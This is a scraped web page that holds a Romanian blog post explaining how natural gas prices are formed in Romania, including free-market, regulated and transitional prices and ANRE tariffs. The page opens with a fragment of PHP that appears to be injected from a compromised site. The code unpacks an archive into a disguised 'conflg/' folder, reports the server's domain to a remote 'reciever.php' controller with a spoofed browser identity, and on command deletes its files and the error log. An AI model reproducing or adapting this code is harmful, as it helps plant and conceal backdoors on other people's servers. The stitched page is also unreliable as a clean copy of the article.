'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> PretCorectLaGaze: Cum se formează preţul la gaze? | Dumitru Chisalita

Rss

PretCorectLaGaze: Cum se formează preţul la gaze?

images8O2ZOSZQÎn România, există mai multe categorii de preţuri pe piaţa gazelor naturale, acest aspect crează multe confuzii.

Se impune a se realiza diferenţa între preţul mărfii (gazele la punctele de import sau la intrarea în sistemul de transport din câmpurile de producţie) şi tarifele aferente servicilor necesare a se transporta gazele naturale de la câmpurile de producţie şi/sau punctele de import la consumatorul final. Acestea cuprind tarifele de transport, tarifele de distribuţie şi tarifele de înmagazinare a gazelor (în perioada caldă, cererea este mai scăzută decât producţia, gazele fiind folosite în perioada rece când cererea este mai mare decât producţia). Tarifele serviciilor de transport, înmagazinare şi distribuţie sunt tarife reglementate de ANRE, aplicabile similar tuturor participanţilor din piaţă.

Vom prezenta în continuare principalele categorii de preţuri şi modul lor de formare:

1. Preţul gazelor la intrarea în sistemul de transport din câmpurile de producţie.

1.1. Preţul liber tranzacţionat pe piaţă între producătorii de gaze şi furnizorii sau consumatorii de gaze .

Stabilirea acestor preţuri se poate stabilii prin contracte bilaterale, în urma unor negocieri directe sau prin intermediul burselor de gaze (BRM şi OPCOM). Majoritatea tranzacțiilor pe această piaţă se încheie prin contracte bilaterale. Această situaţie a impus începând cu vara anului trecut, obligaţia legală de a se tranzacţiona minim 35% din cantitatea produsă pe bursă.

 1.2. Preţul gazelor din producţia internă aprobat prin Hotărâre de Guvern, pe perioada de liberalizare treptată a pieţii (2015 – 2021) stabilită prin Legea 123/2012, la care producătorii sunt obligaţi să vândă gaze destinate consumatorului casnic de gaze sau energie termică.

2. Preţul gazelor din import.Preţul liber tranzacţionat pe piaţă între importatorii de gaze sau subsidiarele acestora şi furnizorii sau consumatorii de gaze. Stabilirea acestor preţuri se face prin contracte bilaterale, în urma unor negocieri directe.

Notă: Aceste preţuri (pct 1 şi 2) nu includ servicii, cumpărătorul acestor gaze fiind obligat să şi contracteze singur aceste servicii cu operatorul de transport (TRANSGAZ), operatorii de distribuţie (unul din cei 38 de operatori de distribuţie) şi operatorii de înmagazinare (2 operatori în România).

3. Preţul gazelor la consumatorul final

3.1. Preţul liber tranzacţionat pe piaţăîntre furnizori şi consumatorii finali. Stabilirea acestor preţuri se poate face prin contracte bilaterale, în urma unor negocieri directe sau prin intermediul burselor de gaze (BRM şi OPCOM). Majoritatea contractelor se încheie prin contracte bilaterale. Această situaţie a impus începând cu 1 ianuarie 2015, obligaţia legală de a se tranzacţiona minim 35% din cantitatea vândută pe bursă.

piata libera

Sursa: În lipsa unor date despre piaţa de gaze din România, cifrele sunt orientative, datele bazându-se pe rapoartele ANRE 2013/2014

Preţul pe piaţa liberă se formează din însumarea preţului de achizitie a gazelor din producţia internă, preţul de achiziţie a gazelor din import, tarifele de transport, tarifele de distribuţie, tarifele pentru servicii de înmagazinare şi marja comercială a vânzătorilor. Ponderea gazelor din intern şi import se stabileşte începând cu data de 1 ianuarie 2015 de către furnizor în parte.

3.2. Preţul reglementat, stabilit prin Ordine ale ANRE, exclusiv pentru consumatorul casnic de gaze şi producătorii de energie termică care livrează gaze la consumatori casnici. Acest preţ se stabileşte separat pentru fiecare societate care vinde gaze pe piaţa reglementată.

piata reglementata

Sursa: În lipsa unor date despre piaţa de gaze din România, cifrele sunt orientative datele bazându-se pe rapoartele ANRE 2013/2014

Preţul reglementat se formează din însumarea preţului de achizitie a gazelor din producţia internă cu o pondere de 98% în cantitatea de gaz vândută, preţul de achiziţie a gazelor din producţia internă cu o pondere de 2% în cantitatea de gaz vândută, tarifele de transport, tarifele de distribuţie, tarifele pentru servicii de înmagazinare şi marja comercială a vânzătorilor fixată de ANRE.

3.3. Preţul de tranziţie pentru clienţii non-casnici (gradiniţe, spitale, şcoli, cămine de bătrâni, brutării, magazine etc.), care se va aplica pentru perioada de tranziţie 1 ianuarie 2015 – 30 iunie 2015 şi care a fost stabilit (impus) de furnizorul de gaze pentru clienţii non-casnici care nu au dorit sau nu au avut timp să-şi negocieze preţul gazelor naturale la 1 ianuarie 2015. La data de 1 iulie 2015 consumatorii non-casnici, vor fi obligaţi să achiziţioneze gaze pe piaţa liberă, dar la preţ negociat.

Preţul pe piaţa liberă se formează din însumarea preţului de achiziţie a gazelor din producţia internă, preţul de achiziţie a gazelor din import, tarifele de transport, tarifele de distribuţie, tarifele pentru servicii de înmagazinare şi marja comercială a vânzătorilor. Ponderea gazelor din intern şi import se stabileşte de către fiecare furnizor.

 În vederea dezvoltării pieţei de gaze şi a protejării clienţilor, am lansat campania Preţ Corect La Gaz, pe

Facebook https://www.facebook.com/PretCorectLaGaz?ref=hl

Twiter: https://twitter.com/PretCorectLaGaz

Blogurile: www.dumitruchisalita.ro, www.adevarul.ro, www.enpg.ro, www.energy-center.ro, www.energynomics.ro, www.bizenergz.ro

unde vom continua să prezentăm situații din piață și recomandări pentru participanții la piață.